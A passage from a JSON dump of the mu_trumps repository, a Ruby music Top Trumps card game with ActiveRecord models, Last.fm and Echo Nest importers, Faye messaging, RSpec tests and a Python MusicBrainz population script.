[\"Justin Bieber\", \"Sufjan Stevens\"]\n end\n end\n end\n \n describe \"leave\" do\n let(:game) { MuTrumps::Game.join(alice) }\n \n it \"removes the player from the game\" do\n game.leave(alice)\n game.reload.users.should == []\n end\n \n it \"throws an error if the user is not in the game\" do\n lambda { game.leave(bob) }.should raise_error(MuTrumps::Game::UnknownPlayer)\n end\n end\n \n describe \"cards\" do\n it \"is populated from random artists when a game is created\" do\n all_artists = MuTrumps::Artist.all\n MuTrumps::Artist.should_receive(:random).with(52).and_return all_artists\n game = MuTrumps::Game.create\n game.cards.map(&:artist).should == all_artists\n end\n end\n\n describe \"play\" do\n before do\n MuTrumps::Game.join(alice)\n @game = MuTrumps::Game.join(bob)\n\n MuTrumps::Artist.all.each_with_index do |artist, index|\n artist.assign(\"stamina\", index)\n end\n end\n\n it \"throws an error if the wrong player tries to play\" do\n @game.current_user.should == alice\n lambda { @game.play(bob, @justin, \"stamina\") }.should raise_error(MuTrumps::Game::PlayOutOfTurn)\n end\n\n it \"throws an error if the artist is not at the top of the user's deck\" do\n @game.current_artist_for(alice).should == @imogen\n lambda { @game.play(alice, @gaga, \"stamina\") }.should raise_error(MuTrumps::Game::NotInDeck)\n end\n \n it \"sets the current stat for the round\" do\n @game.current_stat.should be_nil\n @game.play(alice, @imogen, \"stamina\")\n @game.current_stat.should == \"stamina\"\n end\n \n it \"decides the round when the other player acks\" do\n @game.play(alice, @imogen, \"stamina\")\n @game.should_receive(:round_won_by).with(bob)\n @game.ack(bob)\n @game.current_stat.should be_nil\n end\n \n describe \"when the attacker uses a stat the defense does not have\" do\n before do\n @imogen.assign(\"soundcloud_meetings\", 1)\n end\n \n it \"lets the attacker win\" do\n @game.play(alice, @imogen, \"soundcloud_meetings\")\n @game.should_receive(:round_won_by).with(alice)\n @game.ack(bob)\n end\n end\n end\n\n describe \"round_won_by\" do\n before do\n MuTrumps::Game.join(bob)\n @game = MuTrumps::Game.join(alice)\n end\n\n it \"transfers both current cards to the deck of the winner\" do\n @game.round_won_by(alice)\n @game.cards_for(alice).map(&:artist).should == [@sufjan, @imogen, @justin]\n end\n \n it \"makes the winner of the round the current player\" do\n @game.round_won_by(alice)\n @game.current_user.should == alice\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7413793206214905,
"alphanum_fraction": 0.7413793206214905,
"avg_line_length": 28,
"blob_id": "c1753dbfc4b0ad37de286a820509f53beca6f4b8",
"content_id": "1e886235334ff5ae8d32490f6aafe34a615f0722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/config.ru",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require './lib/mu_trumps'\nrun MuTrumps::Web::Frontend.new\n"
},
{
"alpha_fraction": 0.5225285887718201,
"alphanum_fraction": 0.5238735675811768,
"avg_line_length": 25.087718963623047,
"blob_id": "7098041692e0e47c3895261d9a17e0cf28fb8ccc",
"content_id": "1b18902c5becf5e0e176fd9df7725a83f7b1e014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 57,
"path": "/lib/mu_trumps/importer/lastfm.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n \n class Lastfm\n SERVICE_ROOT = 'http://ws.audioscrobbler.com/2.0/'\n \n def initialize(username)\n @username = username\n end\n \n def import_top_artists\n json = get_data('user.gettopartists', :user => @username)\n json['topartists']['artist'].each do |lfmartist|\n artist = Artist.find_or_create_by_name(lfmartist['name'])\n\n #This presumes that the images are in order of size\n #smallest -> largest and we take the largest.\n if( lfmartist['image'] && lfmartist['image'].length ) then\n artist.image_url = lfmartist['image'].last['#text']\n end\n\n artist.save\n log(\"Imported #{artist.name}\")\n end\n end\n \n def logger(&block)\n @logger = block\n end\n \n private\n \n def log(message)\n return unless @logger\n @logger.call(message)\n end\n \n def get_data(method, params = {})\n query_params = params.merge(\n :method => method,\n :format => 'json',\n :api_key => api_key)\n \n query = query_params.map { |k,v| CGI.escape(k.to_s) + '=' +CGI.escape(v.to_s) }.join('&')\n uri = URI.parse(SERVICE_ROOT + '?' + query)\n response = Net::HTTP.get_response(uri)\n \n JSON.parse(response.body)\n end\n \n def api_key\n Settings.lastfm.api_key\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.6288135647773743,
"alphanum_fraction": 0.6745762825012207,
"avg_line_length": 61.105262756347656,
"blob_id": "ffc74bf57223b1be127f5d7093c72bcaa1311583",
"content_id": "bab34d91f50256f7f77e904e93baafbc5a61c006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 19,
"path": "/spec/web_stubs.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\n\nrequire 'fakeweb'\nFakeWeb.allow_net_connect = %r[^https?://localhost]\n\nFakeWeb.register_uri(:get, 'http://ws.audioscrobbler.com/2.0/?user=jcoglan&method=user.gettopartists&format=json&api_key=fdb6a3b0db7da333c1eb1a7167160397',\n :body => File.read(dir + '/fixtures/top_artists.json'))\n \nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/search?api_key=WDYWSAVVILHXV5RHT&format=json&name=Imogen+Heap',\n :body => File.read(dir + '/fixtures/echonest_search.json'))\n\nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/hotttnesss?api_key=WDYWSAVVILHXV5RHT&id=AR7W7171187B9A8842&format=json',\n :body => File.read(dir + '/fixtures/hotttnesss.json'))\n\nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/familiarity?api_key=WDYWSAVVILHXV5RHT&id=AR7W7171187B9A8842&format=json',\n :body => File.read(dir + '/fixtures/familiarity.json'))\n\nFakeWeb.register_uri(:get, 'http://api.7digital.com/1.2/artist/search?q=Imogen+Heap&oauth_consumer_key=7de69j69ya&country=GB',\n :body => File.read(dir + '/fixtures/7digital.xml'))\n"
},
{
"alpha_fraction": 0.5534539222717285,
"alphanum_fraction": 0.5550987124443054,
"avg_line_length": 21.943395614624023,
"blob_id": "9119b021d31baf37ad7e7bebb57d5a9e0b4a1a6c",
"content_id": "d822ae6dff6d05cad5be77c992eadfef3160f972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 53,
"path": "/spec/mu_trumps/model/statistic_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Statistic do\n let(:artist) { Factory(:artist) }\n \n let(:statistic) do\n MuTrumps::Statistic.create(:artist => artist,\n :name => \"releases\",\n :value => 6)\n end\n \n it \"is valid\" do\n statistic.should be_valid\n end\n \n describe \"without an artist\" do\n before { statistic.artist = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"without a name\" do\n before { statistic.name = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"without a value\" do\n before { statistic.value = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"with the same name as another stat for the same artist\" do\n let(:bad_stat) do\n MuTrumps::Statistic.new(:artist => artist,\n :name => \"releases\",\n :value => 6)\n end\n \n it \"is not valid\" do\n bad_stat.artist.should == statistic.artist\n bad_stat.name.should == statistic.name\n bad_stat.should_not be_valid\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6055194735527039,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 18.25,
"blob_id": "fbdecbb396974b2602affa2cd0583d7b3af2ff10",
"content_id": "8fa9236eaf9b127ea3bd73b2115a105697742d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 32,
"path": "/lib/mu_trumps/model/artist.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Artist < ActiveRecord::Base\n has_many :identifiers\n has_many :statistics\n validates_presence_of :name\n \n def self.random(n)\n all[0...n]\n end\n \n def assign(stat, value)\n statistic = statistics.find_or_create_by_name(stat)\n statistic.update_attribute(:value, value)\n end\n \n def ids\n reduce_to_hash(identifiers)\n end\n\n def stats\n reduce_to_hash(statistics)\n end\n\n def reduce_to_hash(enum)\n stats = {}\n enum.each do |statistic|\n stats[statistic.name] = statistic.value\n end\n stats\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7098445892333984,
"alphanum_fraction": 0.7098445892333984,
"avg_line_length": 26.571428298950195,
"blob_id": "792318886ccb75b37e90f6f2ad8f881e40f3fc7f",
"content_id": "7b8b0ce2b854b5f3efd7d09485cbbeb1a16ee758",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/lib/mu_trumps/model/statistic.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Statistic < ActiveRecord::Base\n belongs_to :artist\n validates_presence_of :artist, :name, :value\n validates_uniqueness_of :name, :scope => :artist_id\n end\nend\n"
},
{
"alpha_fraction": 0.5955315828323364,
"alphanum_fraction": 0.5963020324707031,
"avg_line_length": 30.658536911010742,
"blob_id": "5537b9b123bb52b234d04aa7d21f93eb0a04fe29",
"content_id": "c4b65487ee470392e504732a670a0a812d4cd93c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 41,
"path": "/lib/mu_trumps/importer/echonest.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n \n class Echonest\n SERVICE_ROOT = 'http://developer.echonest.com/api/v4/'\n \n def initialize(artist)\n @artist = artist\n end\n \n def import_hotttnesss\n uri = URI.parse(\"#{SERVICE_ROOT}artist/hotttnesss?api_key=#{api_key}&id=#{artist_id}&format=json\")\n response = Net::HTTP.get_response(uri)\n value = JSON.parse(response.body)['response']['artist']['hotttnesss']\n @artist.assign('hotttnesss', value)\n rescue\n end\n \n def import_familiarity\n uri = URI.parse(\"#{SERVICE_ROOT}artist/familiarity?api_key=#{api_key}&id=#{artist_id}&format=json\")\n response = Net::HTTP.get_response(uri)\n value = JSON.parse(response.body)['response']['artist']['familiarity']\n @artist.assign('familiarity', value)\n rescue\n end\n \n def artist_id\n return @artist_id if defined?(@artist_id)\n \n uri = URI.parse(\"#{SERVICE_ROOT}artist/search?api_key=#{api_key}&format=json&name=#{CGI.escape @artist.name}\")\n response = Net::HTTP.get_response(uri)\n @artist_id = JSON.parse(response.body)['response']['artists'].first['id']\n end\n \n def api_key\n Settings.echonest.api_key\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.5914096832275391,
"alphanum_fraction": 0.6007709503173828,
"avg_line_length": 28.29032325744629,
"blob_id": "912b7ce530a2eaaeaecca40f9313a221a0bc10a2",
"content_id": "c0ea75d1eefb3f32604323d1a967399207334c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1816,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 62,
"path": "/spec/mu_trumps/web/messaging_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Web::Messaging do\n let(:app) do\n app = MuTrumps::Web::Messaging.new(:timeout => 2, :mount => \"/\")\n app.extend(ThinRunner)\n app\n end\n \n before(:all) { app.start(8000) }\n after(:all) { app.stop }\n \n def connect\n endpoint = URI.parse(\"http://localhost:8000/\")\n channel = \"/games/#{game.id}/alice\"\n \n handshake = '{\"channel\":\"/meta/handshake\",\"version\":\"1.0\",\"supportedConnectionTypes\":[\"long-polling\"]}'\n response = Net::HTTP.post_form(endpoint, \"message\" => handshake)\n client_id = JSON.parse(response.body)[0][\"clientId\"]\n \n subscribe = '{\"channel\":\"/meta/subscribe\",\"clientId\":\"' + client_id + '\",\"subscription\":\"' + channel + '\"}'\n response = Net::HTTP.post_form(endpoint, \"message\" => subscribe)\n \n connect = '{\"channel\":\"/meta/connect\",\"clientId\":\"' + client_id + '\",\"connectionType\":\"long-polling\"}'\n response = Net::HTTP.post_form(endpoint, \"message\" => connect)\n \n JSON.parse(response.body).map { |m| m['data'] }.compact\n end\n \n let(:alice) { Factory :user, :lastfm_username => \"alice\" }\n let(:bob) { Factory :user, :lastfm_username => \"bob\" }\n let(:game) { Factory :game }\n \n before do\n game.join(alice)\n game.join(bob)\n end\n \n describe \"when no messages are sent\" do\n it \"receives no events\" do\n connect.should == []\n end\n \n it \"returns after the timeout\" do\n lambda { connect }.should take(2)\n end\n end\n \n describe \"when a message is sent\" do\n before do\n EM.add_timer(1) { MuTrumps::Web::Messaging.publish(game, alice, \"hello\") }\n end\n \n it \"receives an event\" do\n connect.should == [{\"event\" => \"hello\"}]\n end\n \n it \"returns when the message is sent\" do\n lambda { connect }.should take(1..1.2)\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6536585092544556,
"alphanum_fraction": 0.6536585092544556,
"avg_line_length": 17.636363983154297,
"blob_id": "e5cbe96a09337abd14c2b6003805fb2c183f5718",
"content_id": "120c0b91579149f27f5db71154d17d3e9a9224d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/lib/mu_trumps/model/card.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Card < ActiveRecord::Base\n belongs_to :artist\n belongs_to :game\n belongs_to :user\n \n validates_presence_of :artist, :game\n\n acts_as_list :scope => :game\n end\nend\n"
},
{
"alpha_fraction": 0.5974223017692566,
"alphanum_fraction": 0.6000758409500122,
"avg_line_length": 24.86274528503418,
"blob_id": "43a4f4828cb5b913f7eb7bbd37a8eebe16625117",
"content_id": "593015a3dc0eb6172e1a29f8402705d21623925e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2638,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 102,
"path": "/lib/mu_trumps/model/game.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Game < ActiveRecord::Base\n has_many :cards, :order => :position\n has_and_belongs_to_many :users, :uniq => true\n belongs_to :current_user, :class_name => 'MuTrumps::User'\n \n before_create :generate_deck\n \n DECK_SIZE = 52\n WAITING = 'waiting'\n READY = 'ready'\n \n class PlayOutOfTurn < StandardError ; end\n class NotInDeck < StandardError ; end\n class UnknownPlayer < StandardError ; end\n\n def self.join(user)\n game = last\n game = create unless game and game.users.size < 2\n game.join(user)\n game\n end\n \n def join(user)\n cards.each_with_index do |card, index|\n next unless (users.empty? and index.even?) or (not users.empty? and index.odd?)\n card.update_attribute(:user, user)\n end\n users << user\n self.current_user ||= user\n save\n end\n \n def leave(user)\n raise UnknownPlayer unless users.include?(user)\n users.delete(user)\n end\n \n def cards_for(user)\n cards.select { |card| card.user == user }\n end\n \n def current_artist_for(user)\n cards_for(user).first.artist\n end\n \n def waiting_user\n users.select { |user| user != current_user }.first\n end\n\n def play(user, artist, stat_name)\n raise PlayOutOfTurn unless user == current_user\n raise NotInDeck unless current_artist_for(user) == artist\n update_attribute(:current_stat, stat_name)\n end\n \n def ack(user)\n raise PlayOutOfTurn unless user != current_user\n attack, defense = [current_user, user].map { |u| current_artist_for(u).stats[current_stat] }\n if defense.nil?\n round_won_by(current_user)\n elsif attack > defense\n round_won_by(current_user)\n elsif defense > attack\n round_won_by(user)\n end\n update_attribute(:current_stat, nil)\n end\n\n def round_won_by(winner)\n loser = users.reject { |u| u == winner }.first\n top_cards = [loser, winner].map { |u| cards_for(u).first }\n top_cards.each do |card|\n card.reload\n card.update_attribute(:user, winner)\n card.move_to_bottom\n end\n update_attribute(:current_user, winner)\n reload\n end\n \n def winner\n remaining = users.select { |u| cards_for(u).size > 0 }\n remaining.size == 1 ? remaining.first : nil\n end\n\n def status\n case users.count\n when 1 then WAITING\n when 2 then READY\n end\n end\n \n private\n \n def generate_deck\n self.cards = Artist.random(DECK_SIZE).map do |artist|\n Card.new(:artist => artist)\n end\n end\n end\nend\n"
},
{
"alpha_fraction": 0.5647969245910645,
"alphanum_fraction": 0.5647969245910645,
"avg_line_length": 20.54166603088379,
"blob_id": "8ba962a5d942a9d97c47199f6d11396c887cc1f2",
"content_id": "ffa4397a9aaabf9b4ea8919cdd8038ffcc0e0c5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 517,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/lib/mu_trumps/web/messaging.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'faye'\n\nmodule MuTrumps\n module Web\n \n class Messaging < Faye::RackAdapter\n def self.new(*args)\n @instance = super(*args)\n end\n \n def self.publish(*args)\n return unless @instance\n @instance.publish(*args)\n end\n \n def publish(game, user, event, params = {})\n channel = \"/games/#{game.id}/#{user.lastfm_username}\"\n message = params.merge('event' => event)\n get_client.publish(channel, message)\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.6325503587722778,
"alphanum_fraction": 0.6895973086357117,
"avg_line_length": 26.090909957885742,
"blob_id": "c70a34678eb30555107f2235836ff4bc22cf1206",
"content_id": "ed4081d6355edf026ff0b742e2b01027b321b785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 22,
"path": "/spec/mu_trumps/importer/echonest_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::Echonest do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\")\n @importer = MuTrumps::Importer::Echonest.new(@imogen)\n end\n \n describe \"import_hotttnesss\" do\n it \"imports the hotttnesss for all artists\" do\n @importer.import_hotttnesss\n @imogen.stats[\"hotttnesss\"].should == 0.518605607525262\n end\n end\n \n describe \"import_familiarity\" do\n it \"imports the familiarity for all artists\" do\n @importer.import_familiarity\n @imogen.stats[\"familiarity\"].should == 0.81634935777606032\n end\n end\nend\n"
},
{
"alpha_fraction": 0.5885885953903198,
"alphanum_fraction": 0.5885885953903198,
"avg_line_length": 19.8125,
"blob_id": "6815e15c81d41334b92cb2482bacb48e2e9fb4ee",
"content_id": "4fd15ceb849019be6b757588a99b18c6b4da64c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 16,
"path": "/spec/matchers.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "RSpec::Matchers.define :take do |duration|\n match do |proc|\n begin\n start = Time.now\n proc.call\n diff = Time.now - start\n \n case duration\n when Numeric then diff >= duration\n when Range then diff >= duration.begin and diff < duration.end\n end\n rescue => e\n false\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6677316427230835,
"alphanum_fraction": 0.690095841884613,
"avg_line_length": 23.076923370361328,
"blob_id": "7576d528ba50c003dde2cd8aa883b822452c357e",
"content_id": "45b20d28f08f29d6343b05fcd9597195469bdeba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 13,
"path": "/spec/factories.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'factory_girl'\n\nFactory.define :artist, :class => MuTrumps::Artist do |a|\n a.name 'Imogen Heap'\n a.image_url 'http://userserve-ak.last.fm/serve/34/59404.jpg'\nend\n\nFactory.define :game, :class => MuTrumps::Game do |g|\nend\n\nFactory.define :user, :class => MuTrumps::User do |u|\n u.lastfm_username 'alice'\nend\n"
},
{
"alpha_fraction": 0.5736137628555298,
"alphanum_fraction": 0.5736137628555298,
"avg_line_length": 17.678571701049805,
"blob_id": "5423c00749cdd61b028035577cc55663e1ed3611",
"content_id": "c0f9985d4c73acbc16e4906694324aca73453e97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 28,
"path": "/spec/mu_trumps/model/card_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Card do\n let(:card) do\n MuTrumps::Card.create(:game => Factory(:game),\n :artist => Factory(:artist))\n end\n \n it \"is valid\" do\n card.should be_valid\n end\n \n describe \"without a game\" do\n before { card.game = nil }\n \n it \"is not valid\" do\n card.should_not be_valid\n end\n end\n \n describe \"without an artist\" do\n before { card.artist = nil }\n \n it \"is not valid\" do\n card.should_not be_valid\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6820987462997437,
"alphanum_fraction": 0.6851851940155029,
"avg_line_length": 19.90322494506836,
"blob_id": "537afeea8f06032d35e7cdb6113998c8fdbf1daf",
"content_id": "b5b40c8f536b707194daa6a31158420f998f064b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 648,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 31,
"path": "/spec/spec_helper.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\nrequire dir + '/../lib/mu_trumps'\n\nrequire 'fileutils'\nFileUtils.mkdir_p(dir + '/db')\nActiveRecord::Base.establish_connection(\n :adapter => 'sqlite3',\n :database => dir + '/db/test.sqlite3')\n\nrequire dir + '/../config/schema'\nrequire dir + '/factories'\n\nrequire 'rack/test'\nrequire dir + '/thin_runner'\nrequire 'uri'\nrequire 'net/http'\n\nrequire dir + '/matchers'\n\nrequire 'thin'\nThin::Logging.silent = true\n\nrequire dir + '/web_stubs'\n\nRSpec.configure do |config|\n config.after do\n ObjectSpace.each_object(Class) do |klass|\n klass.delete_all if klass < ActiveRecord::Base\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6273072957992554,
"alphanum_fraction": 0.6381650567054749,
"avg_line_length": 29.966386795043945,
"blob_id": "e1aec6ef262712425645c715fcaee8e29f8a5403",
"content_id": "b51c90de7917770fe682ad168a08dfc4813002d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3684,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 119,
"path": "/scripts/populate_release_data.py",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\npopulate_release_data.py\n\nCreated by Benjamin Fields on 2011-01-24.\nCopyright (c) 2011 Goldsmith University of London. All rights reserved.\n\"\"\"\n\nimport sys\nimport os\nimport logging\n\nfrom musicbrainz2.webservice import Query, ArtistFilter, WebServiceError\nimport musicbrainz2.webservice as ws\nimport musicbrainz2.model as m\nfrom time import sleep, strftime\n\nimport sqlite3\n\nSLEEP_TIME = 1.4\nVERBOSE = True\n\ndef main(argv=None):\n\tif argv==None:\n\t\targv=sys.argv\n\t\n\tq = Query()\n\t\n\tconn = sqlite3.connect('db/mu_trumps.sqlite3')\n\tc = conn.cursor()\n\tinsert_cursor = conn.cursor()\n\tc.execute('select * from artists')\n\t\n\tfor artist_id, created, modified, artist_name, artist_url in c:\n\t\ttry:\n\t\t\t# Search for all artists matching the given name. Limit the results\n\t\t\t# to the best match. \n\t\t\tf = ArtistFilter(name=artist_name, limit=5)\n\t\t\tartistResults = q.getArtists(f)\n\t\texcept WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\ttry:\n\t\t\tmbz_id = artistResults[0].artist.id\n\t\texcept IndexError:\n\t\t\tprint \"Could not find a musicbrainz id for the artist\", artist_name, \"moving on...\"\n\t\t\tcontinue\n\t\tif VERBOSE:\n\t\t\tprint \"For artist\", artist_name, \"found id\", artist_id\n\t\ttry:\n\t\t\t# The result should include all official albums.\n\t\t\t#\n\t\t\tinc = ws.ArtistIncludes(\n\t\t\t\treleases=(m.Release.TYPE_OFFICIAL, m.Release.TYPE_ALBUM),\n\t\t\t\ttags=True, releaseGroups=True)\n\t\t\tartist = q.getArtistById(mbz_id, inc)\n\t\texcept ws.WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\talbum_count = len(artist.getReleases())\n\t\tif VERBOSE:\n\t\t\tprint \"\\thas released\", album_count,\"albums.\"\n\t\ttry:\n\t\t\t# The result should include all official albums.\n\t\t\t#\n\t\t\tinc = ws.ArtistIncludes(\n\t\t\t\treleases=(m.Release.TYPE_OFFICIAL, m.Release.TYPE_SINGLE),\n\t\t\t\ttags=True, releaseGroups=True)\n\t\t\tartist = q.getArtistById(mbz_id, inc)\n\t\texcept ws.WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\tsingle_count = len(artist.getReleases())\n\t\tif VERBOSE:\n\t\t\tprint \"\\thas released\", single_count,\"singles.\"\n\t\tinsert_cursor.execute(\"\"\"select * from statistics where artist_id = %i and name = 'albums'\"\"\"%artist_id)\n\t\tif len(list(insert_cursor)) == 0:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\t\"\"\"insert into statistics (\"created_at\",\"updated_at\", \"artist_id\", \"name\", \"value\") \\\n\t\t\t\tvalues ('%s','%s',%i,'%s',%i)\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tstrftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tartist_id, \n\t\t\t\t\t\t\t\t\t\t'albums', \n\t\t\t\t\t\t\t\t\t\talbum_count))\n\t\telse:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\"\"\"update statistics set \"updated_at\" = '%s', \"value\" = %i\\\n\t\t\t where artist_id = %i and name = 'album'\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"), album_count, artist_id))\n\t\tinsert_cursor.execute(\"\"\"select * from statistics where artist_id = %i and name = 'singles'\"\"\"%artist_id)\n\t\tif len(list(insert_cursor)) == 0:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\t\"\"\"insert into statistics (\"created_at\",\"updated_at\", \"artist_id\", \"name\", \"value\") \\\n\t\t\t\tvalues ('%s','%s',%i,'%s',%i)\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tstrftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tartist_id, \n\t\t\t\t\t\t\t\t\t\t'singles', \n\t\t\t\t\t\t\t\t\t\tsingle_count))\n\t\telse:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\"\"\"update statistics set \"updated_at\" = '%s', \"value\" = '%i'\\\n\t\t\t where artist_id = %i and name = 'album'\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"), single_count, artist_id))\n\t\tconn.commit()\n\t\tif VERBOSE:\n\t\t\tprint \"values updated/inserted.\"\n\t\tsleep(SLEEP_TIME)\n\tconn.close()\n\nif __name__ == '__main__':\n\tmain()"
},
{
"alpha_fraction": 0.680701732635498,
"alphanum_fraction": 0.6877192854881287,
"avg_line_length": 24.909090042114258,
"blob_id": "7820cd1e81cff826755e8b0866697a0567ac5832",
"content_id": "eced45e479a4b30710f914ccc91bbffd44453b6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/config/environment.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\n\nrequire 'rubygems'\nrequire 'active_record'\nrequire 'acts_as_list'\nrequire 'fileutils'\nFileUtils.mkdir_p(dir + '/../db')\n\nActiveRecord::Base.establish_connection(\n :adapter => 'sqlite3',\n :database => dir + '/../db/mu_trumps.sqlite3')\n"
},
{
"alpha_fraction": 0.5047022104263306,
"alphanum_fraction": 0.5109717845916748,
"avg_line_length": 20.266666412353516,
"blob_id": "b698de0f16592cee30fbe516f4862e036b1dc0e3",
"content_id": "42398e4f73a5567ff6fe0237b593418e849cf268",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 15,
"path": "/lib/mu_trumps/web/frontend.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
